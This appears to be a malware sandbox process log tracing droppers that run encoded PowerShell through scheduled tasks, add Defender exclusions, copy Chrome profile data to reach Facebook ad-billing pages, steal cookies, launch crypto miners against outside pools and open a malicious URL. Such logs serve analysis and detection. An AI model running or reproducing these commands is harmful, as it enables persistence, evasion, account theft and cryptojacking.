C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "giQzPxIjQ" /SC once /ST 04:29:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
17⤵
- Creates scheduled task(s)
PID:7228

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "giQzPxIjQ"
17⤵
- Modifies registry class
PID:4164

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "giQzPxIjQ"
17⤵
PID:4468

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 19:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\AqSWrSA.exe\" 9n /site_id 754 /S" /V1 /F
17⤵
- Creates scheduled task(s)
PID:6780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\czqzvxjh.xov\Four.exe & exit
15⤵
PID:4820

C:\Users\Admin\AppData\Local\Temp\czqzvxjh.xov\Four.exe
C:\Users\Admin\AppData\Local\Temp\czqzvxjh.xov\Four.exe
16⤵
PID:7436

C:\Users\Admin\AppData\Local\Temp\J9G27WO2JF\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\J9G27WO2JF\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
17⤵
PID:5384

C:\Users\Admin\AppData\Local\Temp\J9G27WO2JF\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\J9G27WO2JF\multitimer.exe" 1 3.1616869596.605f78dc47b39 104
18⤵
PID:5968

C:\Users\Admin\AppData\Local\Temp\J9G27WO2JF\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\J9G27WO2JF\multitimer.exe" 2 3.1616869596.605f78dc47b39
19⤵
PID:2068

C:\Users\Admin\AppData\Local\Temp\smkgribndof\vict.exe
"C:\Users\Admin\AppData\Local\Temp\smkgribndof\vict.exe" /VERYSILENT /id=535
20⤵
PID:60

C:\Users\Admin\AppData\Local\Temp\is-00ASS.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-00ASS.tmp\vict.tmp" /SL5="$30642,870426,780800,C:\Users\Admin\AppData\Local\Temp\smkgribndof\vict.exe" /VERYSILENT /id=535
21⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\is-RMNH5.tmp\winhost.exe
"C:\Users\Admin\AppData\Local\Temp\is-RMNH5.tmp\winhost.exe" 535
22⤵
PID:5212

C:\Users\Admin\AppData\Local\Temp\l5v1t43fgiz\sczfhdica0k.exe
"C:\Users\Admin\AppData\Local\Temp\l5v1t43fgiz\sczfhdica0k.exe" /ustwo INSTALL
20⤵
PID:2032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 648
21⤵
- Program crash
PID:4628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 664
21⤵
- Program crash
PID:5236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 704
21⤵
- Program crash
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 676
21⤵
- Program crash
PID:6868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 888
21⤵
- Program crash
PID:5192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 728
21⤵
- Program crash
PID:8364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 1156
21⤵
- Program crash
PID:8232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 1128
21⤵
- Program crash
PID:3284

C:\Users\Admin\AppData\Local\Temp\3zgd2nlhz0s\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\3zgd2nlhz0s\AwesomePoolU1.exe"
20⤵
PID:5548

C:\Users\Admin\AppData\Local\Temp\bksbx3yr2gn\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\bksbx3yr2gn\Setup3310.exe" /Verysilent /subid=577
20⤵
PID:3516

C:\Users\Admin\AppData\Local\Temp\is-7ETO0.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7ETO0.tmp\Setup3310.tmp" /SL5="$10654,138429,56832,C:\Users\Admin\AppData\Local\Temp\bksbx3yr2gn\Setup3310.exe" /Verysilent /subid=577
21⤵
PID:5852

C:\Users\Admin\AppData\Local\Temp\is-VK8FE.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-VK8FE.tmp\Setup.exe" /Verysilent
22⤵
PID:8472

C:\Users\Admin\AppData\Local\Temp\selekvzv144\app.exe
"C:\Users\Admin\AppData\Local\Temp\selekvzv144\app.exe" /8-23
20⤵
PID:7768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Restless-Sea'
21⤵
PID:5512

C:\Program Files (x86)\Restless-Sea\7za.exe
"C:\Program Files (x86)\Restless-Sea\7za.exe" e -p154.61.71.13 winamp.7z
21⤵
PID:1572

C:\Program Files (x86)\Restless-Sea\app.exe
"C:\Program Files (x86)\Restless-Sea\app.exe" /8-23
21⤵
PID:10060

C:\Users\Admin\AppData\Local\Temp\gnqoijrjfsz\snvahupqnbe.exe
"C:\Users\Admin\AppData\Local\Temp\gnqoijrjfsz\snvahupqnbe.exe" /1-610
20⤵
PID:5740

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Dry-Resonance'
21⤵
PID:7964

C:\Program Files (x86)\Dry-Resonance\7za.exe
"C:\Program Files (x86)\Dry-Resonance\7za.exe" e -p154.61.71.13 winamp.7z
21⤵
PID:3512

C:\Program Files (x86)\Dry-Resonance\snvahupqnbe.exe
"C:\Program Files (x86)\Dry-Resonance\snvahupqnbe.exe" /1-610
21⤵
PID:9380

C:\Users\Admin\AppData\Local\Temp\2YG12JI0XF\setups.exe
"C:\Users\Admin\AppData\Local\Temp\2YG12JI0XF\setups.exe" ll
17⤵
PID:5432

C:\Users\Admin\AppData\Local\Temp\is-FU13B.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FU13B.tmp\setups.tmp" /SL5="$9031E,408070,216064,C:\Users\Admin\AppData\Local\Temp\2YG12JI0XF\setups.exe" ll
18⤵
PID:7424

C:\Users\Admin\AppData\Local\Temp\a8-69a57-70f-145b1-a282234107dbc\Kiqafanicy.exe
"C:\Users\Admin\AppData\Local\Temp\a8-69a57-70f-145b1-a282234107dbc\Kiqafanicy.exe"
14⤵
PID:3088

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 2192
15⤵
PID:7656

C:\Program Files (x86)\VR\Versium Research\hjjgaa.exe
"C:\Program Files (x86)\VR\Versium Research\hjjgaa.exe"
11⤵
PID:1760

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:6688

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:6136

C:\Users\Admin\AppData\Local\Temp\2uc2epr43da\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\2uc2epr43da\AwesomePoolU1.exe"
8⤵
PID:5196

C:\Users\Admin\AppData\Local\Temp\g5arx0us5xk\s3jzz2sspe0.exe
"C:\Users\Admin\AppData\Local\Temp\g5arx0us5xk\s3jzz2sspe0.exe" /ustwo INSTALL
8⤵
- Executes dropped EXE
PID:5412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 648
9⤵
- Program crash
PID:5352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 664
9⤵
- Program crash
PID:5280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 632
9⤵
- Program crash
PID:5936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 624
9⤵
- Program crash
PID:3716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 880
9⤵
- Program crash
PID:5320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 952
9⤵
- Program crash
PID:6328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 1284
9⤵
- Program crash
PID:5752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 1336
9⤵
- Program crash
PID:6552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 1444
9⤵
- Program crash
PID:5712

C:\Users\Admin\AppData\Local\Temp\qxdcokqajv3\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\qxdcokqajv3\vpn.exe" /silent /subid=482
8⤵
- Executes dropped EXE
PID:5560

C:\Users\Admin\AppData\Local\Temp\is-5AEV2.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5AEV2.tmp\vpn.tmp" /SL5="$303E6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\qxdcokqajv3\vpn.exe" /silent /subid=482
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
10⤵
PID:6568

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
11⤵
PID:6904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
10⤵
PID:6796

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
11⤵
PID:6788

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
10⤵
PID:7276

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
10⤵
PID:6660

C:\Users\Admin\AppData\Local\Temp\0urlz0w1jqn\0yyetja1get.exe
"C:\Users\Admin\AppData\Local\Temp\0urlz0w1jqn\0yyetja1get.exe" /1-610
8⤵
- Executes dropped EXE
PID:5604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Frosty-Silence'
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:5648

C:\Program Files (x86)\Frosty-Silence\7za.exe
"C:\Program Files (x86)\Frosty-Silence\7za.exe" e -p154.61.71.13 winamp.7z
9⤵
PID:6944

C:\Program Files (x86)\Frosty-Silence\0yyetja1get.exe
"C:\Program Files (x86)\Frosty-Silence\0yyetja1get.exe" /1-610
9⤵
PID:4264

C:\Users\Admin\AppData\Local\Temp\aixs05o4j45\app.exe
"C:\Users\Admin\AppData\Local\Temp\aixs05o4j45\app.exe" /8-23
8⤵
- Executes dropped EXE
PID:5692

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Solitary-Dream'
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:5724

C:\Program Files (x86)\Solitary-Dream\7za.exe
"C:\Program Files (x86)\Solitary-Dream\7za.exe" e -p154.61.71.13 winamp.7z
9⤵
PID:6964

C:\Program Files (x86)\Solitary-Dream\app.exe
"C:\Program Files (x86)\Solitary-Dream\app.exe" /8-23
9⤵
PID:4004

C:\Users\Admin\AppData\Local\Temp\hjslrujh0vo\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\hjslrujh0vo\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
- Executes dropped EXE
PID:5756

C:\Users\Admin\AppData\Local\Temp\is-66TOS.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-66TOS.tmp\IBInstaller_97039.tmp" /SL5="$10568,9935198,721408,C:\Users\Admin\AppData\Local\Temp\hjslrujh0vo\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5848

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://ilovenigerdickz.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
10⤵
PID:6008

C:\Users\Admin\AppData\Local\Temp\is-8QMN3.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-8QMN3.tmp\{app}\chrome_proxy.exe"
10⤵
- Executes dropped EXE
PID:6052

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-8QMN3.tmp\{app}\chrome_proxy.exe"
11⤵
PID:3640

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
12⤵
- Runs ping.exe
PID:7420

C:\Users\Admin\AppData\Local\Temp\whuzjidw3lk\layawhdydqp.exe
"C:\Users\Admin\AppData\Local\Temp\whuzjidw3lk\layawhdydqp.exe" /quiet SILENT=1 AF=756
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5736

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\whuzjidw3lk\layawhdydqp.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\whuzjidw3lk\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616613711 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
9⤵
PID:6580

C:\Users\Admin\AppData\Local\Temp\WRMVWFQRTV\setups.exe
"C:\Users\Admin\AppData\Local\Temp\WRMVWFQRTV\setups.exe" ll
5⤵
- Executes dropped EXE
PID:2012

C:\Users\Admin\AppData\Local\Temp\is-M65N5.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M65N5.tmp\setups.tmp" /SL5="$202EA,408070,216064,C:\Users\Admin\AppData\Local\Temp\WRMVWFQRTV\setups.exe" ll
6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:844

C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
4⤵
- Executes dropped EXE
- Drops Chrome extension
- Suspicious use of AdjustPrivilegeToken
PID:364

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:4160

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2252

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
5⤵
- Enumerates system info in registry
PID:3012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
5⤵
- Suspicious use of FindShellTrayWindow
PID:1772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffcf1c56e00,0x7ffcf1c56e10,0x7ffcf1c56e20
6⤵
PID:1924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2176 /prefetch:8
6⤵
PID:1572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1892 /prefetch:8
6⤵
PID:4504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1520 /prefetch:2
6⤵
PID:4412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:1
6⤵
PID:3188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:1
6⤵
PID:2068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
6⤵
PID:4832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
6⤵
PID:3424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
6⤵
PID:900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
6⤵
PID:4532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=3076 /prefetch:2
6⤵
PID:3540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3948 /prefetch:8
6⤵
PID:6356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5172 /prefetch:8
6⤵
PID:7568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3856 /prefetch:8
6⤵
PID:5304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3776 /prefetch:8
6⤵
PID:7928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
6⤵
PID:7220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1476 /prefetch:1
6⤵
PID:7116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,8786304084069689931,8866165091804349623,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1
6⤵
PID:8052

C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
4⤵
- Executes dropped EXE
PID:2808

C:\Users\Admin\AppData\Roaming\681C.tmp.exe
"C:\Users\Admin\AppData\Roaming\681C.tmp.exe"
5⤵
PID:5552

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
6⤵
PID:5316

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
6⤵
PID:5908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
5⤵
PID:4432

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:6448

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
4⤵
PID:6484

C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
4⤵
PID:6236

C:\ProgramData\8208940.exe
"C:\ProgramData\8208940.exe"
5⤵
PID:7456

C:\ProgramData\4040619.exe
"C:\ProgramData\4040619.exe"
5⤵
PID:8068

C:\ProgramData\6365558.exe
"C:\ProgramData\6365558.exe"
5⤵
PID:7416

C:\ProgramData\8435573.exe
"C:\ProgramData\8435573.exe"
5⤵
PID:3156

C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
4⤵
PID:7840

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:388

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:4268

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4164

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3888

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2064

